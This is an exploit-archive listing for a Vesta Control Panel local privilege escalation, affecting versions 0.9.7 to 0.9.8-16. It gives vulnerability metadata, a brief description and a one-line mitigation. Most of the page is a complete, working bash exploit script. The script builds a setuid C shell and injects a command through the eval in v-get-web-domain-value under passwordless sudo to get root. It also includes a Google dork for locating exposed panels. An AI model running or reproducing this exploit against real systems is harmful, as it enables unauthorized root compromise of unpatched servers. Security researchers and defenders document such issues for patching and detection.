Vesta Control Panel 0.9.7 - exploit.company

vendor:

Vesta Control Panel

by:

Jaka Hudoklin

7,2

CVSS

HIGH

Command Injection

CWE

Product Name: Vesta Control Panel

Affected Version From: 0.9.7

Affected Version To: 0.9.8-16

Patch Exists: YES

Related CWE: N/A

CPE: a:vestacp:vesta_control_panel

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2018

Vesta Control Panel 0.9.7 <= 0.9.8-16 Local Privilege Escalation Exploit

Vesta CP default install script adds /usr/local/vesta/bin/ directory into /etc/sudoers.d with the NOPASSWD option for the default 'admin' user. All programs in /usr/local/vesta/bin/ directory can therefore be run as root. A command injection vulnerability in 'v-get-web-domain-value' script can be exploited to run arbitrary commands and escalate from admin user to root. Parameter $3 (key) in v-get-web-domain-value is not properly sanitized before being passed to bash eval.

Mitigation:

Ensure that all user input is properly sanitized before being passed to bash eval.

Source

Exploit-DB raw data:

#!/bin/bash
# 
# Exploit Title: Vesta Control Panel 0.9.7 <= 0.9.8-16 Local Privilege Escalation Exploit
# Google Dork: vesta control panel inurl:8083
# Exploit Author: Jaka Hudoklin @offlinehacker
# Vendor Homepage: http://vestacp.com/
# Software Link: https://github.com/serghey-rodin/vesta
# Version: 0.9.7 - 0.9.8-16
#
# Description:
# Vesta CP default install script adds /usr/local/vesta/bin/ directory into
# /etc/sudoers.d with the NOPASSWD option for the default "admin" user. All
# programs in /usr/local/vesta/bin/ directory can therefore be run as root. A
# command injection vulnerability in "v-get-web-domain-value" script can be
# exploited to run arbitrary commands and escalate from admin user to root.
#
# Vulnerability:
# Parameter $3 (key) in v-get-web-domain-value is not properly sanitized before
# being passed to bash eval.
#
#

# Navigate to a writeable directory, usually /tmp.
cd /tmp

# Write a simple C suid shell to suid.c.
cat > suid.c << _EOF
int main(void) {
       setgid(0); setuid(0);
       execl("/bin/sh","sh",0); }
_EOF

# Compile suid shell with gcc.
# [!] If there is no gcc on the system deploy a precompiled binary manually.
gcc suid.c -o suid

# Create a shell script called PWN that will be run as root.
# PWN will weaponize ./suid with executable permissions and suid bit.
echo "chown root:root suid; chmod 777 suid; chmod +s suid;" > PWN

# Make PWN shell script executable.
chmod +x PWN

# Inject command to run PWN into v-get-web-domain-value parameter $3.
sudo /usr/local/vesta/bin/v-get-web-domain-value 'admin' 'domain.com' 'x; ./PWN;'

# Spawn the root shell.
./suid